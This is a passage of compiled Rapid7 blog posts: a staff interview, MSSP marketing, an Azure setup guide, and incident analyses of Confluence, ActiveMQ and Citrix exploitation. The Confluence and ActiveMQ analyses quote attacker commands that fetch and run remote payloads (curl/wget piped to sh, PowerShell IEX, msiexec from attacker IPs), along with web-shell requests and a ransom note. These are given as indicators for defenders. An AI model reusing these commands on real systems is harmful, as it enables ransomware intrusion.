At Rapid7, my team’s job is to search for reported vulnerabilities and communicate those within our product (InsightVM) so that our customers can determine whether or not they are at risk. With different software vulnerabilities, each case is unique. This makes our job different from traditional engineering where you follow one recipe or code path and deploy it. I’m constantly drawing inspiration from past challenges and experiences to think about how to approach each new case here. I enjoy the opportunity to be creative in identifying solutions and helping our product deliver the best outcomes to our customers.

What was it that initially attracted you to Rapid7?

To be honest, I had never heard of the company before. It was exciting to see that it was starting a new office in Prague, while also having an established team globally to collaborate and partner with. I was looking for an opportunity to grow and learn from others and was interested in a global company. Being able to maintain the excitement and energy of a startup environment by being part of a new office is a unique opportunity. It also is a really fun environment building its own organic culture as new people are excited about working for Rapid7 and joining us every week.

What is something you didn’t realize or expect about Rapid7’s culture?

As far as culture, it was a nice surprise to see that even though Rapid7 is a global company and has larger structures in place, it isn’t so rigid that you are bogged down by processes or unable to feel you are  making an impact. For example, right after I joined I had an opportunity to be a part of the interview team for some new roles. I was given that trust automatically to help shape what the office looks like and who we are bringing on board.

Another thing that may be surprising to a lot of people is that even though we are a cybersecurity company, you don’t have to be a cybersecurity expert to have a successful career here. I’m still a software engineer – not a cybersecurity expert (although I’ve learned a lot). What I’m responsible for is still core to my expertise as an engineer, I’m just working within a domain and product that happens to be cybersecurity.

How have you been able to build relationships as a new employee?

We have a really interesting program called “Insight Coffee” that encourages people from around the company to set up 1:1s and get to know one another. There’s no agenda, and it’s truly just to learn about another person’s background, experience, or role. The program opens the door for you to reach out and form relationships in a way that is really approachable and encouraged. If I know I’m going to be working closely with someone on a different team, I’ll set up a quick Insight Coffee to get to know them before diving into a project. That way, when we are working together, it helps open up that avenue of communication and understanding, making the entire process or project run more smoothly.

What was your interview experience like?

After talking with the recruiter about the opportunity, my interview consisted of a call with the Hiring Manager, an interview where we talked about the role and Rapid7’s culture, and a technical challenge. The technical challenge was interesting, and is designed to see how you approach solving a specific problem. Even though I was being assessed on my skills, I felt I was supported and encouraged to ask questions if I was stuck or unsure of something. Now that I am on the other side of this process and helping others with their technical challenge, I know it’s important to understand how someone thinks, what questions they ask, and how they approach the challenge. Of course, getting to the right answer or resolution is the goal, but how they get there and how they approach it is equally important when assessing if someone is the right person for the job. As a manager, I want to bring that same level of support to my team, so they know no matter what challenge they are up against, we are all here to work together and find the best solution as a team.

To learn more about Rapid7’s new office in Prague, click here.
View and apply to Rapid7 jobs in Prague here.

When Maximum Effort Doesn’t Equate to Maximum Results

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/11/21/when-maximum-effort-doesnt-equate-to-maximum-results/

When Maximum Effort Doesn't Equate to Maximum Results

It’s no secret that security teams are feeling beleaguered as a result of the barrage of data, events, and alerts generated by their security tools, to say nothing of the increased budget scrutiny and constrained staff resources that continue to plague cybersecurity practitioners.

The trick is finding the right balance between how much internal teams have to accomplish themselves versus how much they can cede to managed security service providers (MSSPs).

Historically, success in security operations (SecOps) was measured by how quickly teams could react to incoming threats; but the sheer number of alerts that require humans-in-the-loop to determine the accuracy and severity of security events make it nearly impossible for teams to keep up. Additionally, the number of tools deployed in a given organization today – to say nothing of the complexity required to make those tools work in concert – means reacting alone won’t get the job done anyway.

Unfortunately, many MSSPs don’t do enough to relieve customers of noisy alerts without expensive consulting agreements, which puts the burden to evaluate and remediate incidents back on already strapped in-house teams.

Traditional approaches have the added disadvantages of being too siloed, too slow, too antiquated for cloud environments, and too convoluted to demonstrate their value. Analysts at a leading research firm predict that within the next 12-18 months, 33% of organizations that currently have internal security functions will attempt and fail to build an effective internal SecOps because of resource constraints such as lack of budget, expertise, and staffing. Analysts further expect that within the next 12-18 months, 90% of internal SecOps will outsource at least 50% of their operational workloads – which makes choosing an MSSP you trust of paramount importance.

MSSPs enable organizations to maximize resilience while minimizing complexity and optimizing staff resources. The best solutions in the market will drive greater efficiency and consolidation by unifying vulnerability management and managed detection and response (MDR) into a single, cohesive security service built by practitioners for practitioners. They will offer 24x7x365 services that “follow the sun” (meaning no one service center is responsible for 100% of support calls; the work is distributed in certified centers of excellence around the world) so that top-notch support is readily available where and when you need it. Complete coverage and end-to-end detection and response services means you can feel confident that your teams are always ready for what comes next.

But it’s important to choose an MSSP that eschews a one-size-fits-all approach. Rather, look for a partner that is dynamic and flexible enough to meet the particular risk profile and business priorities of your organization, one adaptable enough to conform to changes in evolving threats and attack vectors.

Partnering with the right MSSP also allows you to optimize your SecOps for today’s distributed environments, built for the speed and scale of the cloud. Operating in the cloud means you can integrate hundreds of services with the thousands of devices connecting to them seamlessly and in real time; it also means you must protect and secure a sprawling surface with a multitude of potential entry points that threat actors can exploit.

To meet the challenge, choose an MSSP that offers complete coverage from a single, end-to-end solution so that you’re not left responding to an overabundance of events, alerts, and false positives or trying to protect an attack surface too big to contain.

Look for providers that deliver unlimited data, unlimited incident response, and unlimited intelligence so that when a forensic analysis is performed, their detailed remediation and mitigation recommendations make sure you can improve your resilience against future threats. And in the unfortunate event that a breach becomes a full-scope incident-response engagement, you want a partner that will work with you round-the-clock on the forensic investigation and deliver answers that will remove attackers from your environment as quickly as possible – without charging additional consulting fees.

Partnering with a proven MSSP will also boost your visibility across all services and devices to anticipate the most imminent risks, prevent attacks earlier, and respond to events faster. Additionally, an engagement that includes threat exposure manageability at scale through unified endpoint-to-cloud coverage can identify and respond to threats anywhere while breaking down functional and geographic silos that stall efficiency and reduce collaboration.

Critical functions like threat hunting and patch management can be automated across many tools and processes to reduce reliance on manual work. Machine learning and artificial intelligence models can be paired with internal threat telemetry data and chatbots to triage events, increase staff productivity, or produce threat reports that support more targeted and prioritized threat management across the enterprise.

Best of all, the successful use of AI and automation can help reduce the number of tools operating in your environment, which in turn decreases the complexity and cost of security operations.

It’s time to gain the edge over attackers and keep up with the fluid, ever-expanding threat landscape by eliminating threats wherever they emerge and proactively preventing breaches earlier in the kill chain. Partnering with a trusted MSSP will enable you to manage your threat exposure precisely and comprehensively, improve your signal-to-noise ratio, demonstrate tangible ROI from your security investments, and continually advance your security posture.

Learn more about the best criteria to use when reviewing the capabilities of potential MSSP partners.

Setup of Discovery Connection Azure

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/11/08/setup-of-discovery-connection-azure/

Setup of Discovery Connection Azure

By: fuzzy borders

Are you having trouble trying to get your Azure assets into your InsightVM security console? In this blog post, we wanted to bring additional insight into leveraging the Azure Discovery Connection with InsightVM.

This blog post is brought to you by the Fuzzy Borders project, whose members come from different teams across Rapid7. Our goal is to find answers for requests that may fall into gray (fuzzy) areas. Our past work includes example API calls and SQL queries for InsightVM Security Consoles.

We hope this blog will help you get started with assessing your Azure virtual machines in InsightVM.

There are 3 main areas of configuration: Azure App Registration, IAM Subscription, and InsightVM Discovery Connection configuration.

Here is the overview of the steps:

Azure Configuration

  1. App Registration
  2. API Permissions
  3. Generate and Save the Secret Value
  4. IAM role permissions (Subscriptions Tab)
  5. Attach Reader role to App Registration

InsightVM Discovery Connection Configuration
Prerequisite: Allow outbound traffic to Azure from the InsightVM console server.

  1. Create a new site for Azure assets*
  2. Create Azure Discovery Connection
  3. Enter Azure Tenant ID, Application ID, Application Secret certificate Value

*The Azure Site should be dedicated to this discovery connection only.

Please keep note of the following items:

Application ID

Directory ID (a.k.a Tenant ID)

Value for the certificate Secret.

Configure Azure

We need to establish trust between Rapid7 and Azure. Click on “App registrations”

Setup of Discovery Connection Azure

Click: New registration

Setup of Discovery Connection Azure

Enter a display name for the application and click Register at the bottom. In this example we use “FuzzyDiscovery”

Setup of Discovery Connection Azure

We leave default values. Once you click Register it will return the Application ID, and Directory ID (a.k.a Tenant ID) that will be required in later steps.

Tip:
Either take a screenshot or copy and paste both the Application and Directory ID to a secure location to reference later.

Generate and Save the Secret Value

Click on Certificates & Secrets, click: Client Secrets, and add New Client Secret

Setup of Discovery Connection Azure

Important Note: We require the generated Secret Certificate Value, not the Secret ID.

Setup of Discovery Connection Azure

Configure API Permissions

Click on “Add a Permission” Search and Select: “Directory.Read.All”, and click Grant and Consent

Setup of Discovery Connection Azure

Setup of Discovery Connection Azure

Subscription Access

Click Home, and click Subscription, to set up our IAM role.

In the Subscriptions page, click Access Control (IAM), and click Add Role Assignment under “Grant access to this resource”

Setup of Discovery Connection Azure

Select the Reader role

Setup of Discovery Connection Azure

Enter the member created earlier. (Example: FuzzyDiscovery)

Setup of Discovery Connection Azure

Configure Console
Prerequisite: Allow outbound access to Azure https://docs.rapid7.com/nexpose/creating-and-managing-dynamic-discovery-connections/#preparing-insightvm

Create a dedicated new Site as a Destination for your Azure assets https://docs.rapid7.com/nexpose/creating-and-managing-dynamic-discovery-connections/#adding-a-microsoft-azure-connection

Create Azure Discovery Connection

Navigate to Administration – click: Discovery Connections

Setup of Discovery Connection Azure

From Azure App Registration fill out:

Tenant ID
Application ID

Application Security Certificate Value previously generated in Azure

Please note: In the case the secret was not saved previously, a new secret will have to be generated, and the previously generated secret can be revoked.

Troubleshooting Tips:

In the InsightVM console logs, review the eso.log for any errors and provide logs to support via a case.

Rapid7-Observed Exploitation of Atlassian Confluence CVE-2023-22518

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/11/06/etr-rapid7-observed-exploitation-of-atlassian-confluence-cve-2023-22518/

Rapid7-Observed Exploitation of Atlassian Confluence CVE-2023-22518

Daniel Lydon and Conor Quinn contributed attacker behavior insights to this blog.

As of November 5, 2023, Rapid7 Managed Detection and Response (MDR) is observing exploitation of Atlassian Confluence in multiple customer environments, including for ransomware deployment. We have confirmed that at least some of the exploits are targeting CVE-2023-22518, an improper authorization vulnerability affecting Confluence Data Center and Confluence Server. Atlassian published an advisory for the vulnerability on October 31, 2023. MDR has also observed attempts to exploit CVE-2023-22515, a critical broken access control vulnerability in Confluence that came to light on October 4.

Atlassian updated their advisory for CVE-2023-22518 on November 3 to note that exploitation of the vulnerability had been reported to them by a customer.

Observed attacker behavior

Beginning November 5, 2023, Rapid7 MDR began responding to exploitation of Confluence Server within various customer environments. The alerts we observed occurred between 2023-11-05 10:08:34 and 23:05:35 UTC.

The process execution chain, for the most part, is consistent across multiple environments, indicating possible mass exploitation of vulnerable internet-facing Atlassian Confluence servers.

Rapid7 observed POST requests in HTTP access logs (/atlassian/confluence/logs) on both Windows and Linux. The requests were sent to /json/setup-restore.action?synchronous=true, as seen in the example below:

[05/Nov/2023:11:54:54 +0000] - SYSTEMNAME 193.176.179[.]41 POST /json/setup-restore.action?synchronous=true HTTP/1.1 302 44913ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:09 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/?os_authType=basic HTTP/1.1 200 153ms 388712 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 193.176.179[.]41 DELETE /rest/plugins/1.0/web.shell.Plugin-key HTTP/1.1 404 3ms 40 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:10 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /rest/plugins/1.0/?token=-TOKENNUM HTTP/1.1 202 26ms 344 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:11 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/tasks/1f5049f1-6fd7-471d-937c-7afbe3158019 HTTP/1.1 200 4ms 229 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
[05/Nov/2023:11:56:16 +0000] admin SYSTEMNAME 193.176.179[.]41 GET /rest/plugins/1.0/tasks/1f5049f1-6fd7-471d-937c-7afbe3158019 HTTP/1.1 200 3ms 274 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Nov/2023:11:56:16 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 27ms 212 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:17 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 13ms 283 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:17 +0000] admin SYSTEMNAME 193.176.179[.]41 POST /plugins/servlet/com.jsos.shell/ShellServlet?act=3 HTTP/1.1 200 14ms 556 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[05/Nov/2023:11:56:18 +0000] admin SYSTEMNAME 193.176.179[.]41 DELETE /rest/plugins/1.0/web.shell.Plugin-key HTTP/1.1 204 129ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36

Rapid7 managed services observed the following processes on the host systems as part of exploitation:

  • Linux

Parent process:

/opt/atlassian/confluence/jre//bin/java -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=XXXX -Datlassian.plugins.startup.options= -Dorg.apache.tomcat.websocket.DEFAULT_BUFFER_SIZE=32768 -Dconfluence.context.path= -Djava.locale.providers=JRE,SPI,CLDR -Dsynchrony.enable.xhr.fallback=true -Datlassian.plugins.enable.wait=300 -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-YYYY-MM-DD_XX-XX-XX.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -Xlog:gc+age=debug:file=/opt/atlassian/confluence/logs/gc-YYYY-MM-DD_XX-XX-XX.log::filecount=5,filesize=2M -XX:G1ReservePercent=20 -XX:+UseG1GC -XX:+ExplicitGCInvokesConcurrent -XX:+PrintGCDateStamps -XX:+IgnoreUnrecognizedVMOptions -XX:ReservedCodeCacheSize=256m -Xms1024m -Xmx1024m -Dignore.endorsed.dirs= -classpath /opt/atlassian/confluence/bin/bootstrap.jar:/opt/atlassian/confluence/bin/tomcat-juli.jar -Dcatalina.base=/opt/atlassian/confluence -Dcatalina.home=/opt/atlassian/confluence -Djava.io.tmpdir=/opt/atlassian/confluence/temp org.apache.catalina.startup.Bootstrap start

Child process:

/usr/bin/bash -c whoami
Additional Commands (decoded and deobfuscated):
echo -n hxxp://193.176.179[.]41/agae > /tmp/lru
echo -n hxxp://193.43.72[.]11/mdrg > /tmp/lru
  • Windows

Parent process:

"DRIVE:\Confluence\Confluence\bin\tomcat9.exe" "//RS//Confluence"

Child processes:

cmd /c whoami 

Additional Commands (decoded and deobfuscated):
IEX((New-Object Net.WebClient).DownloadString("hxxp[:]//193[.]176[.]179[.]41/tmp.37")) 

Post-exploitation behavior

After the initial enumeration activity (whoami command spawned via Bash), the adversary executed Base64 commands to spawn follow-on commands via python2 or python3.

/usr/bin/bash -c whoami
echo -n hxxp://193.176.179[.]41/agae > /tmp/lru
uname -p 2> /dev/null (spawned by /usr/bin/python3.6)
/usr/bin/id -u (spawned by /usr/bin/python3.6)
/bin/chmod +x ./qnetd (spawned by /usr/bin/python3.6)
/bin/chmod 755 ./qnetd (spawned by /usr/bin/python3.6)
/tmp/qnetd (ransomware execution)

—-----------------------------------------
/usr/bin/bash -c whoami
echo -n hxxp://193.43.72[.]11/mdrg > /tmp/lru
curl -s hxxp://193.43.72[.]11/mdrg.sh || wget -q -O- hxxp://193.43.72[.]11/mdrg[.]sh)%7Csh 
/usr/bin/cat /tmp/lru (spawned by /usr/bin/bash)
/usr/bin/uname -m (spawned by /usr/bin/bash)
/usr/bin/rm -rf /tmp/lru (spawned by /usr/bin/bash)
/usr/bin/rm -rf sh (spawned by /usr/bin/bash)
/usr/bin/id -u (spawned by /usr/bin/bash) 
/usr/bin/rm -rf ./qnetd(spawned by /usr/bin/bash)
/usr/bin/chmod +x ./qnetd (spawned by /usr/bin/bash)
/usr/bin/chmod 755 ./qnetd (spawned by /usr/bin/bash)
/usr/bin/rm -rf ./qnetd (spawned by /usr/bin/python2.7)
/usr/bin/uname -p (spawned by /usr/bin/python2.7)
/usr/bin/id -u (spawned by /usr/bin/python2.7) 
/usr/bin/chmod +x ./qnetd (spawned by /usr/bin/python2.7)
/usr/bin/chmod 755 ./qnetd (spawned by /usr/bin/python2.7)
/tmp/qnetd (ransomware execution)

In multiple attack chains, Rapid7 observed post-exploitation command execution to download a malicious payload hosted at 193.43.72[.]11 and/or 193.176.179[.]41, which, if successful, led to single-system Cerber ransomware deployment on the exploited Confluence server.

Mitigation guidance

All versions of Confluence Server and Confluence Data Center are vulnerable to CVE-2023-22518. The vulnerability has been remediated in the following fixed versions:

  • 7.19.16
  • 8.3.4
  • 8.4.4
  • 8.5.3
  • 8.6.1

Atlassian Cloud users are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.

Customers should update to a fixed version of Confluence on an emergency basis, restricting external access to the application at least until they are able to remediate. If you are unable to restrict access to the application or update on an emergency basis, Atlassian’s advisory includes interim measures you can take to mitigate risk from known attack vectors. As always, Rapid7 strongly recommends applying vendor-supplied patches rather than relying solely on temporary mitigations.

Indicators of compromise

IP addresses:

  • 193.176.179[.]41
  • 193.43.72[.]11
  • 45.145.6[.]112

Domains:
j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad[.]onion

File hashes:

  • Bat file: /tmp/agttydcb.bat – MD5: 81b760d4057c7c704f18c3f6b3e6b2c4

  • ELF ransomware binary: /tmp/qnetd – SHA256: 4ed46b98d047f5ed26553c6f4fded7209933ca9632b998d265870e3557a5cdfe

Ransom note: read-me3.txt

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2023-22518 with an unauthenticated check available as of the November 1, 2023 content release.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7’s expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. The following detection rules are deployed and alerting on activity related to Atlassian Confluence exploitation:

  • Suspicious Process – Confluence Java App Launching Processes
  • Webshell – Commands Launched by Webserver

Suspected Exploitation of Apache ActiveMQ CVE-2023-46604

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/

Suspected Exploitation of Apache ActiveMQ CVE-2023-46604

Tom Elkins, John Fenninger, Evan McCann, Matthew Smith, and Micah Young contributed attacker behavior insights to this blog.

Beginning Friday, October 27, Rapid7 Managed Detection and Response (MDR) identified suspected exploitation of Apache ActiveMQ CVE-2023-46604 in two different customer environments. In both instances, the adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations. Based on the ransom note and available evidence, we attribute the activity to the HelloKitty ransomware family, whose source code was leaked on a forum in early October. Rapid7 observed similar indicators of compromise across the affected customer environments, both of which were running outdated versions of Apache ActiveMQ.

CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker “to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.” This is one of the more convoluted vulnerability descriptions we’ve seen, but the root cause of the issue is insecure deserialization.

Apache disclosed the vulnerability and released new versions of ActiveMQ on October 25, 2023. Proof-of-concept exploit code and vulnerability details are both publicly available. Rapid7’s vulnerability research team has tested the public PoC and confirmed that the behavior MDR observed in customer environments is similar to what we would expect from exploitation of CVE-2023-46604. Rapid7 research has a technical analysis of the vulnerability in AttackerKB.

Affected Products

According to Apache’s advisory, CVE-2023-46604 affects the following:

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Observed Attacker Behavior

During a successful exploitation of the vulnerability, Java.exe will contain the specific Apache application being targeted — in this case, D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64, which was observed as the parent process in both incidents. Post-exploitation, the adversary attempted to load remote binaries named M2.png and M4.png using MSIExec. The threat actor’s attempts at ransomware deployment were somewhat clumsy: In one of the incidents Rapid7 observed, there were more than half a dozen unsuccessful attempts to encrypt assets.

HelloKitty Ransomware Details

Rapid7 acquired the MSI files M4.png and M2.png from the domain 172.245.16[.]125 and analyzed them in a controlled environment. After analysis, Rapid7 observed that both MSI files contained a 32-bit .NET executable internally named dllloader. Within the .NET executable dllloader, Rapid7 found that the executable loads a Base64-encoded payload. We decoded the Base64-encoded payload and determined that it was a 32-bit .NET DLL named EncDLL.

The EncDLL binary contained functionality similar to that of ransomware — the DLL searches for specific processes and stops them from running. Rapid7 observed the DLL will encrypt specific file extensions using the RSACryptoServiceProvider function, appending encrypted files with the extension .locked. We also observed another function that provided information about which directories to avoid encrypting, a static variable assigned with the ransomware note, and a function that attempted communication to an HTTP server, 172.245.16[.]125.

The ransomware note indicated communications should occur through the email address service@hellokittycat[.]online:

send 0.1btc to my address:bc1ql8an5slxutu3yjyu9rvhsfcpv29tsfhv3j9lr4. contact email:[email protected],if you can't contact my email, please contact some data recovery company(suggest taobao.com), may they can contact to me.

Indicators of Compromise

Rapid7’s vulnerability research team analyzed CVE-2023-46604 and available public exploit code. In our test setup, activemq.log had a single line entry for successful exploitation of CVE-2023-46604:

2023-10-31 05:04:58,736 | WARN  | Transport Connection to: tcp://192.168.86.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616

In the above example, the attacker’s IP was 192.168.86.35, and the target TCP port was 61616. More or less information may be available depending on the logging settings, which can be modified.

Other IOCs:

Files dropped and executed via the msiexec command:

  • cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"
  • cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"

The following files hashes were part of the two MSI packages downloaded from the domain 172.245.16[.]125:

  • M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
  • M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
  • dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
  • EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C

Mitigation Guidance

Organizations should update to a fixed version of ActiveMQ as soon as possible and look for indicators of compromise in their environments. Apache-supplied updates are available here. Apache also has information on improving the security of ActiveMQ implementations here.

Rapid7 Customers

Rapid7 MDR, InsightIDR, and Managed Threat Complete (MTC) customers have the following rules deployed and alerting on the post-exploitation activity related to this threat. Rapid7 recommends ensuring the Insight Agent is deployed to all applicable assets within our customers’ environments:

  • Suspicious Process – Apache ActiveMQ Launching CMD Process
  • Attacker Technique – MSIExec loading object via HTTP
  • Suspicious Process – Volume Shadow Service Delete Shadow Copies

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2023-46604 with an authenticated vulnerability check for Windows being targeted for today’s (Wednesday, November 1) content release.

CVE-2023-4966: Exploitation of Citrix NetScaler Information Disclosure Vulnerability

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/

CVE-2023-4966: Exploitation of Citrix NetScaler Information Disclosure Vulnerability

On October 10, 2023, Citrix published an advisory on two vulnerabilities affecting NetScaler ADC and NetScaler Gateway. The more critical of these two issues is CVE-2023-4966, a sensitive information disclosure vulnerability that allows an attacker to read large amounts of memory after the end of a buffer. Notably, that memory includes session tokens, which permits an attacker to impersonate another authenticated user. On October 17, Citrix updated the advisory to indicate that they have observed exploitation in the wild. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also added CVE-2023-4966 to their Known Exploited Vulnerabilities (KEV) catalog.

On October 25, 2023, security firm Assetnote released an analysis, including a proof of concept, that demonstrates how to steal session tokens. Since then, Shadowserver has noted an uptick in scanning for that endpoint. Rapid7 MDR is investigating potential exploitation of this vulnerability in a customer environment but is not yet able to confirm with high confidence that CVE-2023-4966 was the initial access vector.

Rapid7 recommends taking emergency action to mitigate CVE-2023-4966. Threat actors, including ransomware groups, have historically shown strong interest in Citrix NetScaler ADC vulnerabilities. We expect exploitation to increase. Our research team has a technical assessment of the vulnerability and its impact in AttackerKB.

Affected Products

Citrix published a blog on October 23 that has exploitation and mitigation details. Their advisory indicates that CVE-2023-4966 affects the following supported versions of NetScaler ADC and NetScaler Gateway:

* NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50

* NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15

* NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19

* NetScaler ADC 13.1-FIPS before 13.1-37.164

* NetScaler ADC 12.1-FIPS before 12.1-55.300

* NetScaler ADC 12.1-NDcPP before 12.1-55.300

Note: NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL) and is vulnerable.

In order to be exploitable, the appliance must be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server (which is a very common configuration). Citrix has indicated that customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.

Mitigation Guidance

Citrix NetScaler ADC and Gateway users should update to a fixed version immediately, without waiting for a typical patch cycle to occur. Additionally, Citrix’s blog on CVE-2023-4966 recommends killing all active and persistent sessions using the following commands:

kill icaconnection -all

kill rdp connection -all

kill pcoipConnection -all

kill aaa session -all

clear lb persistentSessions

For more information, see Citrix’s advisory.

Rapid7 Customers

InsightVM and Nexpose customers can assess their exposure to both of the CVEs in Citrix’s advisory (CVE-2023-4966, CVE-2023-4967) with authenticated vulnerability checks available in the October 23 content release.

Proactively Prevent Breaches with Expanded Endpoint Protection in Rapid7 MDR

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/10/02/proactively-prevent-breaches-with-expanded-endpoint-protection-in-rapid7-mdr/

Proactively Prevent Breaches with Expanded Endpoint Protection in Rapid7 MDR

Working with thousands of security and risk professionals across the globe, we know that complexity is the top challenge SOCs are facing today. As the attack surface rapidly expands, security teams need more effective ways to keep pace with digital transformation and get out of the cycle of constant reactive fire drills.

So, we have expanded endpoint protection within our leading MDR service, Managed Threat Complete, to include native next-generation antivirus (NGAV) and DFIR powered by our universal Insight Agent.

Building on the powerful vulnerability scanning, high efficacy threat detections, and rapid containment we deliver on the endpoint today, these new capabilities help unlock critical efficiency and consolidation teams need to gain control over their dynamic attack surface.

We’re also excited to integrate Velociraptor directly into InsightIDR. The integration empowers security teams to easily collect, query, and monitor virtually any aspect of their endpoint fleets with leading digital forensics and incident response (DFIR) technology and playbooks. Already a key tool used by our Incident Response consultants in every single Incident Response engagement, customers can now experience the power and insight Velociraptor brings on the endpoint, directly in the product.

Plus, Velociraptor now uses an expressive query language (rather than code), which makes it faster and easier to share custom detections with the open source community. This helps SOC teams root out new threats more quickly, while demonstrating our continued support to open source.

Rapid7 MDR: Full coverage, single trusted partner

A Gartner study found that 75% of organizations pursued security vendor consolidation in 2022, up from 29% in 2020. And we understand why. Rapid environment expansion and constantly escalating threats—combined with a growing skills gap—have left security professionals on their heels and over-indexed on reactive measures alone. Adoption of point solutions to keep up change has resulted in more noise, inefficiency, and burnout. Previous SecOp approaches are broken – there has to be change.

Rapid7 tackles complexity head-on with a more proactive approach to security operations. By unifying relevant exposure management, external threat intelligence, and now prevention capabilities we are able to get ahead of risk and eliminate breaches earlier. This also reduces the noise and alerts downstream, enabling high efficacy threat detection, and accelerated response. With Rapid7, customers can feel confident they are covered from endpoint to the cloud, across both known and unknown threats.

While the attack surface grows, endpoints remain a critical foot in the door and target for attackers. Rapid7 delivers full threat lifecycle coverage on the endpoint via our lightweight agent, including:

  • Anticipate threats to prevent breaches earlier with leading vulnerability management and Next-Gen Antivirus.
  • Rich telemetry, unique intelligence, and curated content drives high efficacy detections.
  • Full kill chain visibility and streamlined automation contain threats faster than ever.
  • Robust forensic insights for expedited investigations and advanced hunting powered by Velociraptor.

Looking Ahead: Proactive Ransomware Prevention

As Rapid7 continues to invest in the most complete endpoint solutions, it will be addressing one of the most pervasive threats organizations face today: ransomware. Leveraging a patented approach from the integrated Minerva technology, these future capabilities will be able to recognize the earliest signals and behaviors to identify and intercept headline-making attacks before they are able to execute.

Rapid7’s incident response team is currently using this technology in the field, and soon these powerful capabilities will be available to rapid7 MDR customers. You can learn more about how Rapid7 protects endpoints here.

Introducing Active Risk

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/09/25/introducing-active-risk/

